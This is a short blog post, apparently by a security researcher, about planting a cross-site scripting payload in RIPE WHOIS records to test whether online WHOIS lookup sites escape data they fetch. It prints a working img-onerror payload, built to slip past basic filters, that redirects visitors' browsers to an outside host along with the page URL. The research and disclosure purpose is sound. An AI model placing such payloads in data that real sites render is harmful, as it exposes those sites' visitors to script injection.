I am very interested in WHOIS, so I had to wonder if there was a possibility for XSS in some of these online WHOIS clients.

So what I did is adding some JavaScript to the WHOIS of an IPv6 block and an IPv4 address 2a0d:1a45:6663::/48 and I simply added

<img src=1 href=1 onerror="javascript:window.location='https://cynthia.re/pages/whois-xss/'+window.location">

to the objects in the RIPE database. I did an img element with onerror instead of a straight up script tag to avoid the most basic XSS filters.

And surprise, surprise, in just a few minutes I found 2 sites that were exploitable, now I will mention that there was probably not much of value on those pages otherwise.

But my main point with this experiment was to watch the alternative “inputs” since most decent websites do filter the user inputs, the thing they might not filter however is data they fetch from somewhere.

Examples of data like that is WHOIS, and the thing about WHOIS is that while this is not true for any domain WHOIS (that I am aware of, excluding registrar’s whois), when it comes to ASN’s and IPv4 addresses, all 5 RIRs (Regional Internet Registry) allow people to place custom data in the WHOIS.

If you find any pages who are vulnerable, please do contact the owners of that site and/or if you wish, contact me via email or on twitter.